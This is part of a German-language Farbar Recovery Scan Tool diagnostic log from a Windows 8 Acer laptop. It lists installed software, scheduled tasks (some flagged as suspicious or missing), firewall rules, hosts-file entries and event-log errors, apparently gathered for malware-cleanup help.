2016-02-01 19:30 - 2012-09-11 13:25 - 00001024 ___RH C:\Users\Public\Documents\NTIMMV9Acer.dll
2016-02-01 19:30 - 2012-08-03 03:28 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-01-31 21:00 - 2012-09-11 13:08 - 00000000 ____D C:\Program Files (x86)\Qualcomm Atheros
2016-01-31 20:46 - 2012-09-11 12:56 - 00000000 ___HD C:\Program Files (x86)\Temp
2016-01-31 20:37 - 2012-08-03 03:26 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-01-31 20:37 - 2012-08-03 03:26 - 00000000 ____D C:\ProgramData\WildTangent
2016-01-31 20:34 - 2012-08-03 03:29 - 00000000 ____D C:\Program Files (x86)\Acer
2016-01-31 20:32 - 2012-08-03 03:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer
2016-01-31 20:07 - 2012-08-03 03:22 - 00000000 ____D C:\Users\Administrator
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\WinStore
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\Cursors
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Windows Defender
2016-01-31 20:01 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\registration
2016-01-31 20:01 - 2012-07-26 06:38 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-01-31 20:01 - 2012-07-26 06:37 - 00000000 ____D C:\WINDOWS\servicing
2016-01-31 20:00 - 2012-09-11 13:26 - 00000000 ____D C:\ProgramData\Norton
2016-01-31 20:00 - 2012-09-11 13:03 - 00000000 ____D C:\Program Files (x86)\Bluetooth Suite
2016-01-31 20:00 - 2012-08-03 03:30 - 00000000 ____D C:\ProgramData\Temp
2016-01-31 20:00 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-01-31 20:00 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Common Files\System
2016-01-31 20:00 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-01-31 20:00 - 2012-07-26 08:52 - 00000000 ____D C:\Program Files\Windows Journal
2016-01-31 15:10 - 2012-07-26 08:19 - 00281248 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-01-31 14:21 - 2012-09-11 13:26 - 00000000 ____D C:\ProgramData\NortonInstaller
2016-01-31 14:21 - 2012-09-11 12:57 - 00000000 ____D C:\Dolby PCEE4
2016-01-31 13:37 - 2012-08-03 04:18 - 00000000 ___HD C:\OEM
2016-01-31 13:36 - 2012-09-11 13:23 - 00000000 ____D C:\ProgramData\OEM
2016-01-31 13:34 - 2012-07-26 09:12 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-01-31 11:55 - 2012-08-03 04:21 - 00000000 ___DC C:\WINDOWS\Panther
2016-01-31 10:38 - 2012-07-26 09:12 - 00000000 __RHD C:\Users\Public\Libraries
2016-01-31 10:38 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Windows NT
2016-01-31 10:36 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\tracing
2016-01-31 10:35 - 2012-07-26 09:13 - 00262144 _____ C:\WINDOWS\system32\config\BCD-Template
2016-01-20 14:30 - 2014-06-24 18:44 - 00000000 ____D C:\Users\Manz\Documents\My Digital Editions
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2012-09-11 12:57 - 2012-09-11 12:57 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
==================== Bamital & volsnap =================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2012-08-03 03:21
==================== Ende von FRST.txt ============================
Addition Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-01-2016
durchgeführt von Manz (2016-02-08 00:29:48)
Gestartet von E:\
Windows 8 (X64) (2016-01-31 10:55:10)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-2229505580-413648313-3343944023-500 - Administrator - Disabled) => C:\Users\Administrator
Gast (S-1-5-21-2229505580-413648313-3343944023-501 - Limited - Disabled)
Manz (S-1-5-21-2229505580-413648313-3343944023-1002 - Administrator - Enabled) => C:\Users\Manz
UpdatusUser (S-1-5-21-2229505580-413648313-3343944023-1005 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: McAfee Anti-Virus und Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus und Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall (Enabled) {959DA8E2-3527-57D1-4915-924367AD4FE9}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0059 - NTI Corporation)
Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3007 - Acer Incorporated)
Acer Instant Update Service (HKLM\...\{F6100F13-F183-47A2-94A8-9AAC4976E228}) (Version: 1.00.3013 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3006 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3011 - Acer Incorporated)
AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3115 - Acer Incorporated)
AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3201 - Acer Incorporated)
Backup Manager v4 (x32 Version: 4.0.0.0059 - NTI Corporation) Hidden
clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3107 - Acer Incorporated)
GMX MailCheck (HKLM-x32\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.6.1 - 1&1 Mail & Media GmbH)
GMX Softwareaktualisierung (HKLM-x32\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.3.0 - 1&1 Mail & Media GmbH)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2828 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Malwarebytes Anti-Malware Version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee Internet Security Suite (HKLM-x32\...\MSC) (Version: 12.8.992 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.141 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 38.5.1 - Mozilla)
Mozilla Thunderbird 38.5.1 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 38.5.1 (x86 de)) (Version: 38.5.1 - Mozilla)
NVIDIA Grafiktreiber 306.97 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 306.97 - NVIDIA Corporation)
NVIDIA Update 1.10.8 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.10.8 - NVIDIA Corporation)
Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3200 - Acer)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.204 - Ihr Firmenname)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.05 - Qualcomm Atheros)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {1B2DFC51-4A80-475F-9BD8-32F048149B3C} - \Builder Touch2 -> Keine Datei <==== ACHTUNG
Task: {1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675} - \Builder Touch -> Keine Datei <==== ACHTUNG
Task: {56F00EA3-177B-4C69-9AFB-515D10EC8640} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-08-22] (Acer Incorporated)
Task: {75FE0009-11AD-45E4-87F0-7FA1441696FF} - \ManzObscenelyAdV2 -> Keine Datei <==== ACHTUNG
Task: {7E357E48-E878-42AC-930E-3D02D011BE22} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] ()
Task: {8DA43EC2-117C-4EFF-A8EE-A7DC6FEF0790} - System32\Tasks\Recovery Management\Notification => C:\Program Files\Acer\Acer Recovery Management\Notification\Notification.exe [2012-07-31] (Acer Incorporated)
Task: {9B972E21-327E-4B96-891F-AABF3DAE5C2C} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] ()
Task: {9F1578F2-3470-4928-BC4F-310518E1E9D8} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {AF4BE34F-0EFF-4488-881A-1BBB7F357543} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-08-24] ()
Task: {AF603348-4FAB-4919-B73D-66B59E54CBDF} - System32\Tasks\Awiikjuw => C:\PROGRA~1\SHOPPE~1\Zelba.bat
Task: {F08F28CB-C795-40AE-BFF7-0AEB1389F890} - System32\Tasks\Registration 1und1 Task => C:\Program Files (x86)\1und1Softwareaktualisierung\cdsupdclient.exe [2015-01-12] (1&1 Mail & Media GmbH)
Task: {FD40ECC5-8C1B-4823-9BDA-73B39E4B7CB1} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-22] ()
Task: {FD4BD04B-AE55-4A01-A755-4E28A2548E48} - \{0D0B7D47-0F7D-040B-7811-090D050F117E} -> Keine Datei <==== ACHTUNG
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2012-08-10 09:54 - 2012-08-08 16:48 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-08-22 22:26 - 2012-08-22 22:26 - 00465384 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\sqlite3.dll
2012-08-22 22:25 - 2012-08-22 22:25 - 00125504 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\MailConverter32.dll
2012-08-22 22:26 - 2012-08-22 22:26 - 00155712 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\VolumeSnapshot.dll
2012-08-22 22:25 - 2012-08-22 22:25 - 00118336 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\Online.dll
2012-08-22 22:25 - 2012-08-22 22:25 - 01081408 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\ACE.dll
2012-08-22 22:25 - 2012-08-22 22:25 - 00052288 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\OsSettingPort.dll
2012-08-22 22:26 - 2012-08-22 22:26 - 00727616 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\OutlookShadow.dll
2012-08-22 14:04 - 2012-08-22 14:04 - 00025232 _____ () C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe
2012-08-22 14:04 - 2012-08-22 14:04 - 00044176 _____ () C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"
==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ==========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2012-07-26 06:26 - 2016-01-31 14:03 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Manz\Pictures\2016-01-11\033.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{C493EAE8-ACF7-4D44-AF9D-38E92861C275}] => (Allow) C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManager.exe
FirewallRules: [{92D4EB48-EF5E-4121-81FD-8F4290040FF0}] => (Allow) C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
FirewallRules: [{D072D69F-BB06-41C6-8939-C75C07F915E7}] => (Allow) C:\Program Files (x86)\NTI\Acer Backup Manager\FileExplorer.exe
FirewallRules: [{774B5997-E19D-4D17-8929-0C411063A67E}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
FirewallRules: [{5E1CE66E-8003-4DB8-9A94-B650DBF19F10}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
FirewallRules: [{D37E09C7-4CF4-49DD-8F8C-4E3752668960}] => (Allow) C:\Program Files (x86)\Bluetooth Suite\Btvstack.exe
FirewallRules: [{F2E19E40-C05F-4894-93CA-85637787D000}] => (Allow) C:\Program Files (x86)\Bluetooth Suite\BtTray.exe
FirewallRules: [{90D2BF30-C3F7-4987-BDD3-763DC69B44F7}] => (Allow) C:\Program Files (x86)\Bluetooth Suite\BtTray.exe
FirewallRules: [{57EBD0A4-B5B2-4806-8C1E-90019A66BAD1}] => (Allow) C:\Program Files (x86)\Bluetooth Suite\Win7Ui.exe
FirewallRules: [{3283C695-DF2B-4984-B59E-BCCA2168EDEE}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{0A725071-67F3-4AFE-9852-C9F26B033581}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{2972567B-E83A-4133-8A7E-78D040E5D7CF}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{B93D31F2-6372-4E32-B082-039DFF1BF558}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{B536C492-9E28-4F4F-93BA-7ED8D1B78CCD}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\DMCDaemon.exe
FirewallRules: [{A48A07FE-8D5C-43CC-A42E-D0BD028E29F9}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\DMCDaemon.exe
FirewallRules: [{E25824F6-8487-44A9-9BC5-F07EB6D65059}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\WindowsUpnpMV.exe
FirewallRules: [{5FB90EED-6EA2-497B-9F48-CF522045E4B8}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\WindowsUpnpMV.exe
FirewallRules: [{88EE0B3E-5570-48A8-90E8-667670B90D43}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe
FirewallRules: [{E3F2C5CA-5BF3-45A8-A009-EB793BE95A86}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\MusicPlayer.exe
FirewallRules: [{D53FD004-455A-4EC7-BDBA-83BD19BD1EDB}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\DMCDaemon.exe
FirewallRules: [{00EA5227-1B42-4B15-BD0E-42235EF56224}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\DMCDaemon.exe
FirewallRules: [{14324EDF-26D1-4926-ACD8-BFE1EF10832B}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\WindowsUpnp.exe
FirewallRules: [{4D78C571-1FA0-4CCB-A6B3-03CE6A4AA360}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\WindowsUpnp.exe
FirewallRules: [{B54C9F53-63CE-4AA0-919B-9C75EEF8A37A}] => (Allow) C:\Program Files (x86)\Acer\Acer Cloud\ccd.exe
FirewallRules: [{0AFC80C3-3FD9-4B7B-B6C4-6EBD82938816}] => (Allow) C:\Program Files (x86)\Acer\Acer Cloud\ccd.exe
FirewallRules: [TCP Query User{A20D45A5-7ED4-4F9C-A830-30BED941BCF9}C:\program files (x86)\bluetooth suite\btvstack.exe] => (Block) C:\program files (x86)\bluetooth suite\btvstack.exe
FirewallRules: [UDP Query User{1F7D5A72-1A19-4BD6-ABA6-489E59187608}C:\program files (x86)\bluetooth suite\btvstack.exe] => (Block) C:\program files (x86)\bluetooth suite\btvstack.exe
FirewallRules: [TCP Query User{19821547-FFA2-44EA-B11B-F22EF87FDB29}C:\program files (x86)\bluetooth suite\bttray.exe] => (Block) C:\program files (x86)\bluetooth suite\bttray.exe
FirewallRules: [UDP Query User{886897F9-E05A-43B2-B6A1-4327E8ECAA70}C:\program files (x86)\bluetooth suite\bttray.exe] => (Block) C:\program files (x86)\bluetooth suite\bttray.exe
FirewallRules: [{5E89F522-D109-463B-8C52-ED78B4FE7FBC}] => (Allow) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{4A5FF4A1-A567-4529-83FB-EB4E2BC2A803}] => (Allow) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{E0B062E9-82DD-45E2-99B5-5E5DCB20EE1E}] => (Allow) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{2F74D7E5-F693-48A3-BA08-B7918B6A11D4}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{6B6EDCCE-E582-4921-909E-324CE3D80109}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
==================== Wiederherstellungspunkte =========================
31-01-2016 13:37:31 Windows Update
31-01-2016 19:18:35 Wiederherstellungsvorgang
01-02-2016 19:23:26 Configured NTI Media Maker 9
07-02-2016 20:54:24 Windows Update
==================== Fehlerhafte Geräte im Gerätemanager =============
Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Bluetooth USB Module
Description: Bluetooth USB Module
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Qualcomm Atheros Communications
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (02/07/2016 11:52:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DaS_21.exe, Version: 2.1.0.4, Zeitstempel: 0x540c90b2
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000007fe46332f7c
ID des fehlerhaften Prozesses: 0x152c
Startzeit der fehlerhaften Anwendung: 0xDaS_21.exe0
Pfad der fehlerhaften Anwendung: DaS_21.exe1
Pfad des fehlerhaften Moduls: DaS_21.exe2
Berichtskennung: DaS_21.exe3
Vollständiger Name des fehlerhaften Pakets: DaS_21.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: DaS_21.exe5
Error: (02/07/2016 11:52:19 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: DaS_21.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.NullReferenceException
Stapel:
bei DriverAndServicesOut.GetProcess.GetPathName(System.String)
bei DriverAndServicesOut.GetProcess.GetAllServices(System.String)
bei DriverAndServicesOut.Program.Main(System.String[])
Error: (02/07/2016 09:32:13 PM) (Source: ESENT) (EventID: 215) (User: )
Description: WinMail (6116) WindowsMail0: Die Sicherung wurde abgebrochen, weil sie vom Client angehalten wurde, oder weil die Verbindung mit dem Client unterbrochen wurde.
Error: (02/07/2016 08:13:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: Notification.exe, Version: 6.0.3004.0, Zeitstempel: 0x50174098
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.2.9200.16384, Zeitstempel: 0x5010ab2d
Ausnahmecode: 0xe0434352
Fehleroffset: 0x00000000000189cc
ID des fehlerhaften Prozesses: 0x22fc
Startzeit der fehlerhaften Anwendung: 0xNotification.exe0
Pfad der fehlerhaften Anwendung: Notification.exe1
Pfad des fehlerhaften Moduls: Notification.exe2
Berichtskennung: Notification.exe3
Vollständiger Name des fehlerhaften Pakets: Notification.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Notification.exe5
Error: (02/07/2016 08:13:37 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: Notification.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.ComponentModel.Win32Exception
Stapel:
bei System.Diagnostics.NtProcessManager.GetModuleInfos(Int32, Boolean)
bei System.Diagnostics.Process.get_MainModule()
bei Notification.App.CheckResolution()
bei Notification.App.Main(System.String[])
Error: (02/07/2016 07:22:46 PM) (Source: McLogEvent) (EventID: 5022) (User: NT-AUTORITÄT)
Description: 1
Error: (02/06/2016 07:48:04 PM) (Source: McLogEvent) (EventID: 5051) (User: NT-AUTORITÄT)
Description: C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe900002680 (0xa78)0x000007FE606042EB
Build VSCORE.15.1.0.461 / 5500.1093
Object being scanned = \Device\HarddiskVolume4\WINDOWS\FONTS\MOOLBOR.TTF
